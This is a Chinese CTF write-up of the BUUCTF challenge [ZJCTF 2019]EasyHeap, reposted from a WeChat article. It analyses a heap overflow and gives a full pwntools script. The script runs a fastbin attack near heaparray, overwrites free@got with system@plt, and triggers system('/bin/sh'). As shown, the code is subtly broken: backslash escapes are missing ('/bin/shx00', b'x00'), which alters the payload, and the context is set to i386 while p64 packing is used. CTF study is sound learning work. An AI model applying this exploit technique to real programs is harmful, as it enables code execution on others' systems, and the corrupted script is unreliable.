题目
平台:BUUCTF
题目:[ZJCTF 2019]EasyHeap
考点:堆溢出打fastbin & 覆盖free@got为system@plt
分析
创建堆
bss段创建了heaparray数组存储每创建的堆地址
修改堆
通过heaparray数组里的值定位堆块号,修改时可重新设定堆长度,故存在堆溢出问题
删除堆
free堆块后指针置0,不存在uaf
题目Ubuntu16,先patchelf替换libc成2.23-0ubuntu11.3_amd64,2.26后才是tcache机制,低版本还可以用fastbin attack
这道题给了system@plt,所以没必要打malloc_hook+one_gadget了,直接用system@plt替换free@got,然后传参/bin/sh即可
代码
from pwn import *
from LibcSearcher import *
from struct import pack
from ctypes import *
context(log_level = 'debug', arch = 'i386', os = 'linux')
#p = remote('node5.buuoj.cn', 28552)
p=process('./easyheap')
#p = process(['./ld-2.31.so','./pwn'], env = {'LD_PRELOAD' : './libc-2.31.so'})
#p=gdb.debug('./easyheap','b *0x8048561')
elf = ELF('./easyheap')
#libc=ELF('./libc.so.6')
def create(size, content):
p.sendlineafter(b"choice :", b"1")
p.sendlineafter(b"Size of Heap : ", str(size))
p.sendlineafter(b"Content of heap:", content)
def edit(idx, size, content):
p.sendlineafter(b"choice :", b"2")
p.sendlineafter(b"Index :", str(idx))
p.sendlineafter(b"Size of Heap : ", str(size))
p.sendafter(b"Content of heap : ", content)
def free(idx):
p.sendlineafter(b"choice :", b"3")
p.sendlineafter(b"Index :", str(idx))
create(0x60,'aaaa') #0
create(0x60,'bbbb') #1
create(0x60,'cccc') #2
free(2)
#把chunk2的fd置为0x6020ad(heaparray的附近)
payload = b'/bin/shx00' +b'x00'*0x60 + p64(0x71) + p64(0x6020ad)
edit(1,len(payload),payload)
#第二次申请到heaparray的附近
create(0x60,'a') #2
create(0x60,'b') #3
#填充heaparray首个块chunk0地址修改为free@got地址
payload = b'a'*0x23 + p64(elf.got['free'])
edit(3,len(payload),payload)
#将 free 的got地址修改为 system的plt地址。
edit(0,8,p64(elf.plt['system']))
free(1) # free(1) => system('bin/sh')
p.interactive()
调试
首先创建三个堆然后free掉2号堆使其加入fastbin,通过编辑1号堆并利用堆溢出问题填充进/bin/sh以及修改堆块2的fd指向heaparray附近(因为这里的大小刚好能凑出0x7f)
然后申请两个堆,第二次把堆申请到heaparray数组前面
heaparray数组中记录第一个堆块的地址是0x6020e0,我们现在所拥有的这个堆块可写地址是从0x6020bd开始的,所以需要填充0x23个字符,再然后把指向第一个堆块的指针覆盖为free@got
那么再编辑0号堆块,根据指针和edit功能代码也就是编辑free@got了,直接把其内容改成system@plt
最后再执行free(1),跟进IDA的free功能代码第18行,也就是free了heaparray[1]的内容,heaparray[1]在第一步就被写入了/bin/sh,同时free@got也被替换为了system@plt,那么这行代码实际上就执行了system('/bin/sh')
原文始发于微信公众号(智佳网络安全):CTF学习-PWN-堆溢出覆盖free@got
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/300842.html
